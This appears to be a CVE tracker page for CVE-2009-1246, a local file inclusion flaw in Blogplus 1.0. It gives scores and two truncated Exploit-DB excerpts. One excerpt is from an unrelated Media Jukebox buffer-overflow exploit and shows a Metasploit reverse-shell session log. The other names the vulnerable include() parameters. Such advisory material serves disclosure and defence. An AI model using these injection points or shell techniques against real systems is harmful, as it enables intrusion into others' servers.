CVE-2009-1246
published 2009-04-06CVE-2009-1246: Multiple directory traversal vulnerabilities in Blogplus 1.0 allow remote attackers to include and execute arbitrary local files via a .. (dot dot) in the (1)…
PriorityP341high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
2.86%
85.0th percentile
Multiple directory traversal vulnerabilities in Blogplus 1.0 allow remote attackers to include and execute arbitrary local files via a .. (dot dot) in the (1) row_mysql_blocks_center_down[file] parameter to includes/block_center_down.php; (2) row_mysql_blocks_center_top[file] includes/parameter to block_center_top.php; (3) row_mysql_blocks_left[file] parameter to includes/block_left.php; (4) row_mysql_blocks_right[file] parameter to includes/block_right.php; and row_mysql_bloginfo[theme] parameter to (5) includes/window_down.php and (6) includes/window_top.php.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| blogplus | blogplus | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Media Jukebox 8 - '.pls' Universal Local Buffer (SEH)
exploitdb·2009-08-31
CVE-2009-2650 Media Jukebox 8 - '.pls' Universal Local Buffer (SEH)
Media Jukebox 8 - '.pls' Universal Local Buffer (SEH)
---
#!/usr/bin/python
#
# ######################################################################
#
# Media Jukebox 8 (.pls) Universal Local Buffer Exploit (SEH)
# Author: mr_me
# Download: http://download.chip.eu/en/Media-Jukebox-8.0.400_76134.html
# Note: we needed a header to trigger this one ;)
# Tested on: Wind0ws XP and Vist@
# Greetz: offensive-security, I tried harder :)
#
# ######################################################################
#
# msf exploit(handler) > exploit
#
# [*] Handler binding to LHOST 0.0.0.0
# [*] Started reverse handler
# [*] Starting the payload handler...
# [*] Sending stage (474 bytes)
# [*] Command shell session 3 opened (192.168.0.2:4444 -> 192.168.0.4:1246)
#
# Microsoft Windows XP [Version 5.
Exploit-DB
blogplus 1.0 - Multiple Local File Inclusions
exploitdb·2009-03-26
CVE-2009-1246 blogplus 1.0 - Multiple Local File Inclusions
blogplus 1.0 - Multiple Local File Inclusions
---
--:local file include:--
script:blog+ v1.0
download from:http://www.ziddu.com/download/3151643/blogplus_v1.0_final.zip.html
...............................................
vul:/includes/
block_center_down.php = $block_center_down_file = $row_mysql_blocks_center_down['file']; line 6
include ("blocks/".$block_center_down_file.""); line 7
block_center_top..php = $block_center_top_file = $row_mysql_blocks_center_top['file']; 6
include ("blocks/".$block_center_top_file.""); 7
vul:/includes/
block_left.php = $block_left_file = $row_mysql_blocks_left['file']; line 8
include ("blocks/".$block_left_file.""); 9
block_right.php = $block_right_file = $row_mysql_blocks_right['file']; 6
include ("blocks/".$block_right_file.""); 7
line1; wind
No writeups or analysis indexed.
2009-04-06
Published